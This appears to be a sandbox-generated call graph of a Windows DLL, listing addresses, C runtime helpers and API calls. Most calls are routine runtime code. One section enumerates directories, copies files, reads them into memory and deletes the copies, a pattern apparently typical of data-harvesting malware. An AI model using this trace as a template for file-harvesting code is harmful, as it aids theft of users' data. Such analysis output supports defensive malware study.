6686->6683 6687 212078a3 __startOneArgErrorHandling 5 API calls 6686->6687 6687->6683 6689 2120a99c 6688->6689 6691 2120b5c1 __raise_exc RaiseException 6690->6691 6692 2120b5bc 6691->6692 6692->6686 7474 2120a1c6 IsProcessorFeaturePresent 7475 21207bc7 7476 21207bd3 ___scrt_is_nonwritable_in_current_image 7475->7476 7477 21207c0a _abort 7476->7477 7483 21205671 RtlEnterCriticalSection 7476->7483 7479 21207be7 7480 21207f86 __fassign 20 API calls 7479->7480 7481 21207bf7 7480->7481 7484 21207c10 7481->7484 7483->7479 7487 212056b9 RtlLeaveCriticalSection 7484->7487 7486 21207c17 7486->7477 7487->7486 6693 21205348 6694 21203529 ___vcrt_uninitialize 8 API calls 6693->6694 6695 2120534f 6694->6695 6696 21207b48 6706 21208ebf 6696->6706 6700 21207b55 6719 2120907c 6700->6719 6703 21207b7f 6704 2120571e _free 20 API calls 6703->6704 6705 21207b8a 6704->6705 6723 21208ec8 6706->6723 6708 21207b50 6709 21208fdc 6708->6709 6710 21208fe8 ___scrt_is_nonwritable_in_current_image 6709->6710 6743 21205671 RtlEnterCriticalSection 6710->6743 6712 2120905e 6757 21209073 6712->6757 6714 21209032 RtlDeleteCriticalSection 6717 2120571e _free 20 API calls 6714->6717 6715 2120906a _abort 6715->6700 6718 21208ff3 6717->6718 6718->6712 6718->6714 6744 2120a09c 6718->6744 6720 21209092 6719->6720 6721 21207b64 RtlDeleteCriticalSection 6719->6721 6720->6721 6722 2120571e _free 20 API calls 6720->6722 6721->6700 6721->6703 6722->6721 6724 21208ed4 ___scrt_is_nonwritable_in_current_image 6723->6724 6733 21205671 RtlEnterCriticalSection 6724->6733 6726 21208f77 6738 21208f97 6726->6738 6730 21208f83 _abort 6730->6708 6731 21208ee3 6731->6726 6732 21208e78 66 API calls 6731->6732 6734 21207b94 RtlEnterCriticalSection 6731->6734 6735 21208f6d 6731->6735 6732->6731 6733->6731 6734->6731 6741 21207ba8 RtlLeaveCriticalSection 6735->6741 6737 21208f75 6737->6731 6742 212056b9 RtlLeaveCriticalSection 6738->6742 6740 21208f9e 6740->6730 6741->6737 6742->6740 6743->6718 6745 2120a0a8 ___scrt_is_nonwritable_in_current_image 6744->6745 6746 2120a0b9 6745->6746 6747 2120a0ce 6745->6747 6748 21206368 _free 20 API calls 6746->6748 6755 2120a0c9 _abort 6747->6755 6760 21207b94 RtlEnterCriticalSection 6747->6760 6749 2120a0be 6748->6749 6751 212062ac _abort 26 API calls 6749->6751 6751->6755 6752 2120a0ea 6761 2120a026 6752->6761 6754 2120a0f5 6777 2120a112 6754->6777 6755->6718 7025 212056b9 RtlLeaveCriticalSection 6757->7025 6759 2120907a 6759->6715 6760->6752 6762 2120a033 6761->6762 6763 2120a048 6761->6763 6764 21206368 _free 20 API calls 6762->6764 6769 2120a043 6763->6769 6780 21208e12 6763->6780 6766 2120a038 6764->6766 6768 212062ac _abort 26 API calls 6766->6768 6768->6769 6769->6754 6770 2120907c 20 API calls 6771 2120a064 6770->6771 6786 21207a5a 6771->6786 6773 2120a06a 6793 2120adce 6773->6793 6776 2120571e _free 20 API calls 6776->6769 7024 21207ba8 RtlLeaveCriticalSection 6777->7024 6779 2120a11a 6779->6755 6781 21208e26 6780->6781 6782 21208e2a 6780->6782 6781->6770 6782->6781 6783 21207a5a 26 API calls 6782->6783 6784 21208e4a 6783->6784 6808 21209a22 6784->6808 6787 21207a66 6786->6787 6788 21207a7b 6786->6788 6789 21206368 _free 20 API calls 6787->6789 6788->6773 6790 21207a6b 6789->6790 6791 212062ac _abort 26 API calls 6790->6791 6792 21207a76 6791->6792 6792->6773 6794 2120adf2 6793->6794 6795 2120addd 6793->6795 6796 2120ae2d 6794->6796 6800 2120ae19 6794->6800 6797 21206355 __dosmaperr 20 API calls 6795->6797 6798 21206355 __dosmaperr 20 API calls 6796->6798 6799 2120ade2 6797->6799 6801 2120ae32 6798->6801 6802 21206368 _free 20 API calls 6799->6802 6981 2120ada6 6800->6981 6804 21206368 _free 20 API calls 6801->6804 6806 2120a070 6802->6806 6805 2120ae3a 6804->6805 6807 212062ac _abort 26 API calls 6805->6807 6806->6769 6806->6776 6807->6806 6809 21209a2e ___scrt_is_nonwritable_in_current_image 6808->6809 6810 21209a36 6809->6810 6811 21209a4e 6809->6811 6833 21206355 6810->6833 6812 21209aec 6811->6812 6816 21209a83 6811->6816 6814 21206355 __dosmaperr 20 API calls 6812->6814 6817 21209af1 6814->6817 6836 21208c7b RtlEnterCriticalSection 6816->6836 6821 21206368 _free 20 API calls 6817->6821 6818 21206368 _free 20 API calls 6819 21209a43 _abort 6818->6819 6819->6781 6823 21209af9 6821->6823 6822 21209a89 6824 21209aa5 6822->6824 6825 21209aba 6822->6825 6826 212062ac _abort 26 API calls 6823->6826 6827 21206368 _free 20 API calls 6824->6827 6837 21209b0d 6825->6837 6826->6819 6829 21209aaa 6827->6829 6831 21206355 __dosmaperr 20 API calls 6829->6831 6830 21209ab5 6888 21209ae4 6830->6888 6831->6830 6834 21205b7a _abort 20 API calls 6833->6834 6835 2120635a 6834->6835 6835->6818 6836->6822 6838 21209b3b 6837->6838 6865 21209b34 6837->6865 6839 21209b5e 6838->6839 6840 21209b3f 6838->6840 6844 21209baf 6839->6844 6845 21209b92 6839->6845 6841 21206355 __dosmaperr 20 API calls 6840->6841 6843 21209b44 6841->6843 6842 21202ada _ValidateLocalCookies 5 API calls 6846 21209d15 6842->6846 6847 21206368 _free 20 API calls 6843->6847 6848 21209bc5 6844->6848 6891 2120a00b 6844->6891 6849 21206355 __dosmaperr 20 API calls 6845->6849 6846->6830 6850 21209b4b 6847->6850 6894 212096b2 6848->6894 6853 21209b97 6849->6853 6854 212062ac _abort 26 API calls 6850->6854 6856 21206368 _free 20 API calls 6853->6856 6854->6865 6859 21209b9f 6856->6859 6857 21209bd3 6863 21209bd7 6857->6863 6864 21209bf9 6857->6864 6858 21209c0c 6861 21209c20 6858->6861 6862 21209c66 WriteFile 6858->6862 6860 212062ac _abort 26 API calls 6859->6860 6860->6865 6868 21209c56 6861->6868 6869 21209c28 6861->6869 6866 21209c89 GetLastError 6862->6866 6871 21209bef 6862->6871 6870 21209ccd 6863->6870 6901 21209645 6863->6901 6906 21209492 GetConsoleCP 6864->6906 6865->6842 6866->6871 6932 21209728 6868->6932 6872 21209c46 6869->6872 6873 21209c2d 6869->6873 6870->6865 6876 21206368 _free 20 API calls 6870->6876 6871->6865 6871->6870 6879 21209ca9 6871->6879 6924 212098f5 6872->6924 6873->6870 6917 21209807 6873->6917 6878 21209cf2 6876->6878 6881 21206355 __dosmaperr 20 API calls 6878->6881 6882 21209cb0 6879->6882 6883 21209cc4 6879->6883 6881->6865 6884 21206368 _free 20 API calls 6882->6884 6939 21206332 6883->6939 6886 21209cb5 6884->6886 6887 21206355 __dosmaperr 20 API calls 6886->6887 6887->6865 6980 21208c9e RtlLeaveCriticalSection 6888->6980 6890 21209aea 6890->6819 6944 21209f8d 6891->6944 6966 21208dbc 6894->6966 6896 212096c2 6897 212096c7 6896->6897 6898 21205af6 _abort 38 API calls 6896->6898 6897->6857 6897->6858 6899 212096ea 6898->6899 6899->6897 6900 21209708 GetConsoleMode 6899->6900 6900->6897 6902 2120969f 6901->6902 6905 2120966a 6901->6905 6902->6871 6903 2120a181 WriteConsoleW CreateFileW 6903->6905 6904 212096a1 GetLastError 6904->6902 6905->6902 6905->6903 6905->6904 6912 21209607 6906->6912 6915 212094f5 6906->6915 6907 21202ada _ValidateLocalCookies 5 API calls 6909 21209641 6907->6909 6909->6871 6910 212079e6 40 API calls __fassign 6910->6915 6911 2120957b WideCharToMultiByte 6911->6912 6913 212095a1 WriteFile 6911->6913 6912->6907 6914 2120962a GetLastError 6913->6914 6913->6915 6914->6912 6915->6910 6915->6911 6915->6912 6916 212095d2 WriteFile 6915->6916 6975 21207c19 6915->6975 6916->6914 6916->6915 6920 21209816 6917->6920 6918 212098d8 6921 21202ada _ValidateLocalCookies 5 API calls 6918->6921 6919 21209894 WriteFile 6919->6920 6922 212098da GetLastError 6919->6922 6920->6918 6920->6919 6923 212098f1 6921->6923 6922->6918 6923->6871 6927 21209904 6924->6927 6925 21209a0f 6926 21202ada _ValidateLocalCookies 5 API calls 6925->6926 6928 21209a1e 6926->6928 6927->6925 6929 21209986 WideCharToMultiByte 6927->6929 6931 212099bb WriteFile 6927->6931 6928->6871 6930 21209a07 GetLastError 6929->6930 6929->6931 6930->6925 6931->6927 6931->6930 6936 21209737 6932->6936 6933 212097ea 6934 21202ada _ValidateLocalCookies 5 API calls 6933->6934 6938 21209803 6934->6938 6935 212097a9 WriteFile 6935->6936 6937 212097ec GetLastError 6935->6937 6936->6933 6936->6935 6937->6933 6938->6871 6940 21206355 __dosmaperr 20 API calls 6939->6940 6941 2120633d _free 6940->6941 6942 21206368 _free 20 API calls 6941->6942 6943 21206350 6942->6943 6943->6865 6953 21208d52 6944->6953 6946 21209f9f 6947 21209fa7 6946->6947 6948 21209fb8 SetFilePointerEx 6946->6948 6949 21206368 _free 20 API calls 6947->6949 6950 21209fd0 GetLastError 6948->6950 6951 21209fac 6948->6951 6949->6951 6952 21206332 __dosmaperr 20 API calls 6950->6952 6951->6848 6952->6951 6954 21208d74 6953->6954 6955 21208d5f 6953->6955 6957 21206355 __dosmaperr 20 API calls 6954->6957 6960 21208d99 6954->6960 6956 21206355 __dosmaperr 20 API calls 6955->6956 6958 21208d64 6956->6958 6961 21208da4 6957->6961 6959 21206368 _free 20 API calls 6958->6959 6962 21208d6c 6959->6962 6960->6946 6963 21206368 _free 20 API calls 6961->6963 6962->6946 6964 21208dac 6963->6964 6965 212062ac _abort 26 API calls 6964->6965 6965->6962 6967 21208dd6 6966->6967 6968 21208dc9 6966->6968 6970 21208de2 6967->6970 6971 21206368 _free 20 API calls 6967->6971 6969 21206368 _free 20 API calls 6968->6969 6972 21208dce 6969->6972 6970->6896 6973 21208e03 6971->6973 6972->6896 6974 212062ac _abort 26 API calls 6973->6974 6974->6972 6976 21205af6 _abort 38 API calls 6975->6976 6977 21207c24 6976->6977 6978 21207a00 __fassign 38 API calls 6977->6978 6979 21207c34 6978->6979 6979->6915 6980->6890 6984 2120ad24 6981->6984 6983 2120adca 6983->6806 6985 2120ad30 ___scrt_is_nonwritable_in_current_image 6984->6985 6995 21208c7b RtlEnterCriticalSection 6985->6995 6987 2120ad3e 6988 2120ad70 6987->6988 6989 2120ad65 6987->6989 6991 21206368 _free 20 API calls 6988->6991 6996 2120ae4d 6989->6996 6992 2120ad6b 6991->6992 7011 2120ad9a 6992->7011 6994 2120ad8d _abort 6994->6983 6995->6987 6997 21208d52 26 API calls 6996->6997 7000 2120ae5d 6997->7000 6998 2120ae63 7014 21208cc1 6998->7014 7000->6998 7001 2120ae95 7000->7001 7003 21208d52 26 API calls 7000->7003 7001->6998 7004 21208d52 26 API calls 7001->7004 7006 2120ae8c 7003->7006 7007 2120aea1 CloseHandle 7004->7007 7005 2120aedd 7005->6992 7009 21208d52 26 API calls 7006->7009 7007->6998 7010 2120aead GetLastError 7007->7010 7008 21206332 __dosmaperr 20 API calls 7008->7005 7009->7001 7010->6998 7023 21208c9e RtlLeaveCriticalSection 7011->7023 7013 2120ada4 7013->6994 7015 21208cd0 7014->7015 7016 21208d37 7014->7016 7015->7016 7021 21208cfa 7015->7021 7017 21206368 _free 20 API calls 7016->7017 7018 21208d3c 7017->7018 7019 21206355 __dosmaperr 20 API calls 7018->7019 7020 21208d27 7019->7020 7020->7005 7020->7008 7021->7020 7022 21208d21 SetStdHandle 7021->7022 7022->7020 7023->7013 7024->6779 7025->6759 7026 21202049 7028 21202055 ___scrt_is_nonwritable_in_current_image 7026->7028 7027 2120205e 7028->7027 7029 212020d3 7028->7029 7030 2120207d 7028->7030 7032 21202639 ___scrt_fastfail 4 API calls 7029->7032 7040 2120244c 7030->7040 7033 212020da 7032->7033 7034 21202082 7049 21202308 7034->7049 7036 21202087 __RTC_Initialize 7052 212020c4 7036->7052 7038 2120209f 7055 2120260b 7038->7055 7041 21202451 ___scrt_release_startup_lock 7040->7041 7042 21202455 7041->7042 7045 21202461 7041->7045 7043 2120527a _abort 20 API calls 7042->7043 7044 2120245f 7043->7044 7044->7034 7046 2120246e 7045->7046 7047 2120499b _abort 28 API calls 7045->7047 7046->7034 7048 21204bbd 7047->7048 7048->7034 7061 212034c7 RtlInterlockedFlushSList 7049->7061 7051 21202312 7051->7036 7063 2120246f 7052->7063 7054 212020c9 ___scrt_release_startup_lock 7054->7038 7056 21202617 7055->7056 7057 2120262d 7056->7057 7082 212053ed 7056->7082 7057->7027 7060 21203529 ___vcrt_uninitialize 8 API calls 7060->7057 7062 212034d7 7061->7062 7062->7051 7068 212053ff 7063->7068 7066 2120391b ___vcrt_uninitialize_ptd 6 API calls 7067 2120354d 7066->7067 7067->7054 7071 21205c2b 7068->7071 7072 21202476 7071->7072 7073 21205c35 7071->7073 7072->7066 7075 21205db2 7073->7075 7076 21205c45 _abort 5 API calls 7075->7076 7077 21205dd9 7076->7077 7078 21205df1 TlsFree 7077->7078 7079 21205de5 7077->7079 7078->7079 7080 21202ada _ValidateLocalCookies 5 API calls 7079->7080 7081 21205e02 7080->7081 7081->7072 7085 212074da 7082->7085 7088 212074f3 7085->7088 7086 21202ada _ValidateLocalCookies 5 API calls 7087 21202625 7086->7087 7087->7060 7088->7086 7236 21208a89 7239 21206d60 7236->7239 7240 21206d69 7239->7240 7242 21206d72 7239->7242 7243 21206c5f 7240->7243 7244 21205af6 _abort 38 API calls 7243->7244 7245 21206c6c 7244->7245 7246 21206d7e __fassign 38 API calls 7245->7246 7247 21206c74 7246->7247 7263 212069f3 7247->7263 7249 21206c8b 7249->7242 7251 212056d0 21 API calls 7252 21206c9c 7251->7252 7253 21206cce 7252->7253 7270 21206e20 7252->7270 7255 2120571e _free 20 API calls 7253->7255 7255->7249 7257 21206cc9 7258 21206368 _free 20 API calls 7257->7258 7258->7253 7259 21206d12 7259->7253 7280 212068c9 7259->7280 7260 21206ce6 7260->7259 7261 2120571e _free 20 API calls 7260->7261 7261->7259 7264 212054a7 __fassign 38 API calls 7263->7264 7265 21206a05 7264->7265 7266 21206a14 GetOEMCP 7265->7266 7267 21206a26 7265->7267 7268 21206a3d 7266->7268 7267->7268 7269 21206a2b GetACP 7267->7269 7268->7249 7268->7251 7269->7268 7271 212069f3 40 API calls 7270->7271 7272 21206e3f 7271->7272 7275 21206e90 IsValidCodePage 7272->7275 7277 21206e46 7272->7277 7279 21206eb5 ___scrt_fastfail 7272->7279 7273 21202ada _ValidateLocalCookies 5 API calls 7274 21206cc1 7273->7274 7274->7257 7274->7260 7276 21206ea2 GetCPInfo 7275->7276 7275->7277 7276->7277 7276->7279 7277->7273 7283 21206acb GetCPInfo 7279->7283 7356 21206886 7280->7356 7282 212068ed 7282->7253 7289 21206b05 7283->7289 7292 21206baf 7283->7292 7286 21202ada _ValidateLocalCookies 5 API calls 7288 21206c5b 7286->7288 7288->7277 7293 212086e4 7289->7293 7291 21208a3e 43 API calls 7291->7292 7292->7286 7294 212054a7 __fassign 38 API calls 7293->7294 7295 21208704 MultiByteToWideChar 7294->7295 7297 21208742 7295->7297 7305 212087da 7295->7305 7299 212056d0 21 API calls 7297->7299 7302 21208763 ___scrt_fastfail 7297->7302 7298 21202ada _ValidateLocalCookies 5 API calls 7300 21206b66 7298->7300 7299->7302 7307 21208a3e 7300->7307 7301 212087d4 7312 21208801 7301->7312 7302->7301 7304 212087a8 MultiByteToWideChar 7302->7304 7304->7301 7306 212087c4 GetStringTypeW 7304->7306 7305->7298 7306->7301 7308 212054a7 __fassign 38 API calls 7307->7308 7309 21208a51 7308->7309 7316 21208821 7309->7316 7313 2120880d 7312->7313 7315 2120881e 7312->7315 7314 2120571e _free 20 API calls 7313->7314 7313->7315 7314->7315 7315->7305 7317 2120883c 7316->7317 7318 21208862 MultiByteToWideChar 7317->7318 7319 21208a16 7318->7319 7320 2120888c 7318->7320 7321 21202ada _ValidateLocalCookies 5 API calls 7319->7321 7323 212056d0 21 API calls 7320->7323 7326 212088ad 7320->7326 7322 21206b87 7321->7322 7322->7291 7323->7326 7324 212088f6 MultiByteToWideChar 7325 21208962 7324->7325 7327 2120890f 7324->7327 7329 21208801 __freea 20 API calls 7325->7329 7326->7324 7326->7325 7343 21205f19 7327->7343 7329->7319 7331 21208971 7335 212056d0 21 API calls 7331->7335 7338 21208992 7331->7338 7332 21208939 7332->7325 7334 21205f19 11 API calls 7332->7334 7333 21208a07 7337 21208801 __freea 20 API calls 7333->7337 7334->7325 7335->7338 7336 21205f19 11 API calls 7339 212089e6 7336->7339 7337->7325 7338->7333 7338->7336 7339->7333 7340 212089f5 WideCharToMultiByte 7339->7340 7340->7333 7341 21208a35 7340->7341 7342 21208801 __freea 20 API calls 7341->7342 7342->7325 7344 21205c45 _abort 5 API calls 7343->7344 7345 21205f40 7344->7345 7348 21205f49 7345->7348 7351 21205fa1 7345->7351 7349 21202ada _ValidateLocalCookies 5 API calls 7348->7349 7350 21205f9b 7349->7350 7350->7325 7350->7331 7350->7332 7352 21205c45 _abort 5 API calls 7351->7352 7353 21205fc8 7352->7353 7354 21202ada _ValidateLocalCookies 5 API calls 7353->7354 7355 21205f89 LCMapStringW 7354->7355 7355->7348 7357 21206892 ___scrt_is_nonwritable_in_current_image 7356->7357 7364 21205671 RtlEnterCriticalSection 7357->7364 7359 2120689c 7365 212068f1 7359->7365 7363 212068b5 _abort 7363->7282 7364->7359 7377 21207011 7365->7377 7367 2120693f 7368 21207011 26 API calls 7367->7368 7369 2120695b 7368->7369 7370 21207011 26 API calls 7369->7370 7371 21206979 7370->7371 7372 2120571e _free 20 API calls 7371->7372 7373 212068a9 7371->7373 7372->7373 7374 212068bd 7373->7374 7391 212056b9 RtlLeaveCriticalSection 7374->7391 7376 212068c7 7376->7363 7378 21207022 7377->7378 7381 2120701e 7377->7381 7379 21207029 7378->7379 7384 2120703c ___scrt_fastfail 7378->7384 7380 21206368 _free 20 API calls 7379->7380 7382 2120702e 7380->7382 7381->7367 7383 212062ac _abort 26 API calls 7382->7383 7383->7381 7384->7381 7385 21207073 7384->7385 7386 2120706a 7384->7386 7385->7381 7389 21206368 _free 20 API calls 7385->7389 7387 21206368 _free 20 API calls 7386->7387 7388 2120706f 7387->7388 7390 212062ac _abort 26 API calls 7388->7390 7389->7388 7390->7381 7391->7376 6358 2120220c 6359 21202215 6358->6359 6360 2120221a dllmain_dispatch 6358->6360 6362 212022b1 6359->6362 6363 212022c7 6362->6363 6365 212022d0 6363->6365 6366 21202264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6363->6366 6365->6360 6366->6365 7089 2120724e GetProcessHeap 7090 2120284f 7091 21202882 std::exception::exception 27 API calls 7090->7091 7092 2120285d 7091->7092 7396 21203c90 RtlUnwind 7488 212036d0 7489 212036e2 7488->7489 7491 212036f0 @_EH4_CallFilterFunc@8 7488->7491 7490 21202ada _ValidateLocalCookies 5 API calls 7489->7490 7490->7491 7093 21205351 7094 21205360 7093->7094 7098 21205374 7093->7098 7096 2120571e _free 20 API calls 7094->7096 7094->7098 7095 2120571e _free 20 API calls 7097 21205386 7095->7097 7096->7098 7099 2120571e _free 20 API calls 7097->7099 7098->7095 7100 21205399 7099->7100 7101 2120571e _free 20 API calls 7100->7101 7102 212053aa 7101->7102 7103 2120571e _free 20 API calls 7102->7103 7104 212053bb 7103->7104 7492 212073d5 7493 212073e1 ___scrt_is_nonwritable_in_current_image 7492->7493 7504 21205671 RtlEnterCriticalSection 7493->7504 7495 212073e8 7505 21208be3 7495->7505 7497 212073f7 7503 21207406 7497->7503 7518 21207269 GetStartupInfoW 7497->7518 7500 21207417 _abort 7529 21207422 7503->7529 7504->7495 7506 21208bef ___scrt_is_nonwritable_in_current_image 7505->7506 7507 21208c13 7506->7507 7508 21208bfc 7506->7508 7532 21205671 RtlEnterCriticalSection 7507->7532 7510 21206368 _free 20 API calls 7508->7510 7511 21208c01 7510->7511 7512 212062ac _abort 26 API calls 7511->7512 7514 21208c0b _abort 7512->7514 7514->7497 7516 21208c4b 7540 21208c72 7516->7540 7517 21208c1f 7517->7516 7533 21208b34 7517->7533 7519 21207286 7518->7519 7520 21207318 7518->7520 7519->7520 7521 21208be3 27 API calls 7519->7521 7524 2120731f 7520->7524 7522 212072af 7521->7522 7522->7520 7523 212072dd GetFileType 7522->7523 7523->7522 7525 21207326 7524->7525 7526 21207369 GetStdHandle 7525->7526 7527 212073d1 7525->7527 7528 2120737c GetFileType 7525->7528 7526->7525 7527->7503 7528->7525 7544 212056b9 RtlLeaveCriticalSection 7529->7544 7531 21207429 7531->7500 7532->7517 7534 2120637b _abort 20 API calls 7533->7534 7536 21208b46 7534->7536 7535 21208b53 7537 2120571e _free 20 API calls 7535->7537 7536->7535 7538 21205eb7 11 API calls 7536->7538 7539 21208ba5 7537->7539 7538->7536 7539->7517 7543 212056b9 RtlLeaveCriticalSection 7540->7543 7542 21208c79 7542->7514 7543->7542 7544->7531 7545 21204ed7 7546 21206d60 51 API calls 7545->7546 7547 21204ee9 7546->7547 7556 21207153 GetEnvironmentStringsW 7547->7556 7551 2120571e _free 20 API calls 7552 21204f29 7551->7552 7553 21204eff 7554 2120571e _free 20 API calls 7553->7554 7555 21204ef4 7554->7555 7555->7551 7557 2120716a 7556->7557 7567 212071bd 7556->7567 7558 21207170 WideCharToMultiByte 7557->7558 7561 2120718c 7558->7561 7558->7567 7559 212071c6 FreeEnvironmentStringsW 7560 21204eee 7559->7560 7560->7555 7568 21204f2f 7560->7568 7562 212056d0 21 API calls 7561->7562 7563 21207192 7562->7563 7564 212071af 7563->7564 7565 21207199 WideCharToMultiByte 7563->7565 7566 2120571e _free 20 API calls 7564->7566 7565->7564 7566->7567 7567->7559 7567->7560 7569 21204f44 7568->7569 7570 2120637b _abort 20 API calls 7569->7570 7580 21204f6b 7570->7580 7571 21204fcf 7572 2120571e _free 20 API calls 7571->7572 7573 21204fe9 7572->7573 7573->7553 7574 2120637b _abort 20 API calls 7574->7580 7575 21204fd1 7576 21205000 20 API calls 7575->7576 7578 21204fd7 7576->7578 7577 2120544d ___std_exception_copy 26 API calls 7577->7580 7579 2120571e _free 20 API calls 7578->7579 7579->7571 7580->7571 7580->7574 7580->7575 7580->7577 7581 21204ff3 7580->7581 7583 2120571e _free 20 API calls 7580->7583 7582 212062bc _abort 11 API calls 7581->7582 7584 21204fff 7582->7584 7583->7580 6367 21202418 6368 21202420 ___scrt_release_startup_lock 6367->6368 6371 212047f5 6368->6371 6370 21202448 6372 21204804 6371->6372 6373 21204808 6371->6373 6372->6370 6376 21204815 6373->6376 6377 21205b7a _abort 20 API calls 6376->6377 6380 2120482c 6377->6380 6378 21202ada _ValidateLocalCookies 5 API calls 6379 21204811 6378->6379 6379->6370 6380->6378 7397 21204a9a 7398 21205411 38 API calls 7397->7398 7399 21204aa2 7398->7399 5748 21201c5b 5749 21201c6b ___scrt_fastfail 5748->5749 5752 212012ee 5749->5752 5751 21201c87 5753 21201324 ___scrt_fastfail 5752->5753 5754 212013b7 GetEnvironmentVariableW 5753->5754 5778 212010f1 5754->5778 5757 212010f1 57 API calls 5758 21201465 5757->5758 5759 212010f1 57 API calls 5758->5759 5760 21201479 5759->5760 5761 212010f1 57 API calls 5760->5761 5762 2120148d 5761->5762 5763 212010f1 57 API calls 5762->5763 5764 212014a1 5763->5764 5765 212010f1 57 API calls 5764->5765 5766 212014b5 lstrlenW 5765->5766 5767 212014d2 5766->5767 5768 212014d9 lstrlenW 5766->5768 5767->5751 5769 212010f1 57 API calls 5768->5769 5770 21201501 lstrlenW lstrcatW 5769->5770 5771 212010f1 57 API calls 5770->5771 5772 21201539 lstrlenW lstrcatW 5771->5772 5773 212010f1 57 API calls 5772->5773 5774 2120156b lstrlenW lstrcatW 5773->5774 5775 212010f1 57 API calls 5774->5775 5776 2120159d lstrlenW lstrcatW 5775->5776 5777 212010f1 57 API calls 5776->5777 5777->5767 5779 21201118 ___scrt_fastfail 5778->5779 5780 21201129 lstrlenW 5779->5780 5791 21202c40 5780->5791 5782 21201148 lstrcatW lstrlenW 5783 21201177 lstrlenW FindFirstFileW 5782->5783 5784 21201168 lstrlenW 5782->5784 5785 212011a0 5783->5785 5786 212011e1 5783->5786 5784->5783 5787 212011c7 FindNextFileW 5785->5787 5788 212011aa 5785->5788 5786->5757 5787->5785 5790 212011da FindClose 5787->5790 5788->5787 5793 21201000 5788->5793 5790->5786 5792 21202c57 5791->5792 5792->5782 5792->5792 5794 21201022 ___scrt_fastfail 5793->5794 5795 212010af 5794->5795 5796 2120102f lstrcatW lstrlenW 5794->5796 5797 212010b5 lstrlenW 5795->5797 5808 212010ad 5795->5808 5798 2120105a lstrlenW 5796->5798 5799 2120106b lstrlenW 5796->5799 5824 21201e16 5797->5824 5798->5799 5810 21201e89 lstrlenW 5799->5810 5802 21201088 GetFileAttributesW 5804 2120109c 5802->5804 5802->5808 5803 212010ca 5805 21201e89 5 API calls 5803->5805 5803->5808 5804->5808 5816 2120173a 5804->5816 5807 212010df 5805->5807 5829 212011ea 5807->5829 5808->5788 5811 21202c40 ___scrt_fastfail 5810->5811 5812 21201ea7 lstrcatW lstrlenW 5811->5812 5813 21201ed1 lstrcatW 5812->5813 5814 21201ec2 5812->5814 5813->5802 5814->5813 5815 21201ec7 lstrlenW 5814->5815 5815->5813 5817 21201747 ___scrt_fastfail 5816->5817 5844 21201cca 5817->5844 5821 2120199f 5821->5808 5823 21201824 ___scrt_fastfail _strlen 5823->5821 5864 212015da 5823->5864 5825 21201e29 5824->5825 5828 21201e4c 5824->5828 5826 21201e2d lstrlenW 5825->5826 5825->5828 5827 21201e3f lstrlenW 5826->5827 5826->5828 5827->5828 5828->5803 5830 2120120e ___scrt_fastfail 5829->5830 5831 21201e89 5 API calls 5830->5831 5832 21201220 GetFileAttributesW 5831->5832 5833 21201235 5832->5833 5834 21201246 5832->5834 5833->5834 5836 2120173a 35 API calls 5833->5836 5835 21201e89 5 API calls 5834->5835 5837 21201258 5835->5837 5836->5834 5838 212010f1 56 API calls 5837->5838 5839 2120126d 5838->5839 5840 21201e89 5 API calls 5839->5840 5841 2120127f ___scrt_fastfail 5840->5841 5842 212010f1 56 API calls 5841->5842 5843 212012e6 5842->5843 5843->5808 5845 21201cf1 ___scrt_fastfail 5844->5845 5846 21201d0f CopyFileW CreateFileW 5845->5846 5847 21201d44 DeleteFileW 5846->5847 5848 21201d55 GetFileSize 5846->5848 5853 21201808 5847->5853 5849 21201ede 22 API calls 5848->5849 5850 21201d66 ReadFile 5849->5850 5851 21201d94 CloseHandle DeleteFileW 5850->5851 5852 21201d7d CloseHandle DeleteFileW 5850->5852 5851->5853 5852->5853 5853->5821 5854 21201ede 5853->5854 5858 2120222f 5854->5858 5856 2120224e 5856->5823 5858->5856 5860 21202250 5858->5860 5872 2120474f 5858->5872 5877 212047e5 5858->5877 5859 21202908 5861 212035d2 __CxxThrowException@8 RaiseException 5859->5861 5860->5859 5884 212035d2 5860->5884 5863 21202925 5861->5863 5863->5823 5865 2120160c _strcat _strlen 5864->5865 5866 2120163c lstrlenW 5865->5866 5972 21201c9d 5866->5972 5868 21201655 lstrcatW lstrlenW 5869 21201678 5868->5869 5870 21201693 ___scrt_fastfail 5869->5870 5871 2120167e lstrcatW 5869->5871 5870->5823 5871->5870 5887 21204793 5872->5887 5874 21204765 5893 21202ada 5874->5893 5876 2120478f 5876->5858 5882 212056d0 _abort 5877->5882 5878 2120570e 5906 21206368 5878->5906 5880 212056f9 RtlAllocateHeap 5881 2120570c 5880->5881 5880->5882 5881->5858 5882->5878 5882->5880 5883 2120474f _abort 7 API calls 5882->5883 5883->5882 5886 212035f2 RaiseException 5884->5886 5886->5859 5888 2120479f ___scrt_is_nonwritable_in_current_image 5887->5888 5900 21205671 RtlEnterCriticalSection 5888->5900 5890 212047aa 5901 212047dc 5890->5901 5892 212047d1 _abort 5892->5874 5894 21202ae3 5893->5894 5895 21202ae5 IsProcessorFeaturePresent 5893->5895 5894->5876 5897 21202b58 5895->5897 5905 21202b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5897->5905 5899 21202c3b 5899->5876 5900->5890 5904 212056b9 RtlLeaveCriticalSection 5901->5904 5903 212047e3 5903->5892 5904->5903 5905->5899 5909 21205b7a GetLastError 5906->5909 5910 21205b93 5909->5910 5911 21205b99 5909->5911 5928 21205e08 5910->5928 5915 21205bf0 SetLastError 5911->5915 5935 2120637b 5911->5935 5918 21205bf9 5915->5918 5916 21205bb3 5942 2120571e 5916->5942 5918->5881 5921 21205bcf 5955 2120593c 5921->5955 5922 21205bb9 5923 21205be7 SetLastError 5922->5923 5923->5918 5926 2120571e _free 17 API calls 5927 21205be0 5926->5927 5927->5915 5927->5923 5960 21205c45 5928->5960 5930 21205e2f 5931 21205e47 TlsGetValue 5930->5931 5934 21205e3b 5930->5934 5931->5934 5932 21202ada _ValidateLocalCookies 5 API calls 5933 21205e58 5932->5933 5933->5911 5934->5932 5936 21206388 _abort 5935->5936 5937 212063c8 5936->5937 5938 212063b3 RtlAllocateHeap 5936->5938 5941 2120474f _abort 7 API calls 5936->5941 5939 21206368 _free 19 API calls 5937->5939 5938->5936 5940 21205bab 5938->5940 5939->5940 5940->5916 5948 21205e5e 5940->5948 5941->5936 5943 21205752 _free 5942->5943 5944 21205729 HeapFree 5942->5944 5943->5922 5944->5943 5945 2120573e 5944->5945 5946 21206368 _free 18 API calls 5945->5946 5947 21205744 GetLastError 5946->5947 5947->5943 5949 21205c45 _abort 5 API calls 5948->5949 5950 21205e85 